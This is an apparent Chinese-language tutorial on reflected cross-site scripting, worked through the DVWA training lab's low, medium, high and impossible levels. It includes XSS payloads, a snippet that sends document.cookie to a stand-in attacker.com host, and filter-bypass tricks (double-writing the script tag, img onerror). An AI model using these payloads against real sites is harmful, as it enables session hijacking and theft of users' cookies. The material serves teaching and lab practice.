dvwa之xss(reflected)

发布时间:2026/7/30 16:02:32
dvwa之xss(reflected) 1. 什么是反射型XSS反射型XSSReflected Cross-Site Scripting是一种常见的Web安全漏洞攻击者将恶意脚本注入到URL参数中当用户点击包含这些恶意参数的链接时服务器会“反射”这些参数到响应页面中执行从而在用户浏览器中执行攻击者的脚本。2. 攻击原理与流程反射型XSS的攻击流程通常如下攻击者构造一个包含恶意脚本的URL例如https://example.com/search?qscriptalert(XSS)/script攻击者通过邮件、社交媒体或钓鱼网站等方式诱使用户点击该链接用户点击链接浏览器向服务器发送请求服务器未对输入参数进行过滤直接将恶意参数返回到响应页面用户的浏览器解析响应执行其中的恶意脚本3. 常见攻击场景搜索功能搜索关键词直接显示在结果页面错误消息错误信息中包含用户输入的内容URL重定向重定向参数未经验证表单提交提交后显示确认信息页面4. 攻击示例4.1 基础示例假设有一个搜索页面!-- 搜索页面 -- form action/search methodGET input typetext nameq placeholder搜索... button typesubmit搜索/button /form !-- 搜索结果页面 -- div idresults 您搜索的关键词是?php echo $_GET[q]; ? /div攻击者可以构造URLhttps://example.com/search?qscriptalert(document.cookie)/script4.2 窃取Cookie示例// 恶意脚本示例 script var img new Image(); img.src https://attacker.com/steal?cookie encodeURIComponent(document.cookie); /script5. 危害与影响会话劫持窃取用户的会话Cookie冒充用户身份钓鱼攻击伪造登录页面诱导用户输入敏感信息键盘记录监控用户的键盘输入网页篡改修改页面内容传播恶意信息重定向攻击将用户重定向到恶意网站low尝试直接构造JavaScript语句进行cookie的窃取发现可以成功窃取查看代码可以发现没有做任何的防护medium依旧尝试直接写入JavaScript语句发现是直接放回怀疑对script进行了过滤可以尝试利用双写进行绕过尝试成功high双写绕过失败推测可能采用了正则表达式的搜索和替换所以我们需要采用其他事件进行绕过以达到攻击的目的因此直接在payload中构造img src1 οnerrοralert(document.cookie)impossible这里直接通过htmlspecialchars将预定的字符转化为html实体从而防止我们进行html注入

相关新闻

最新新闻

日新闻

周新闻

月新闻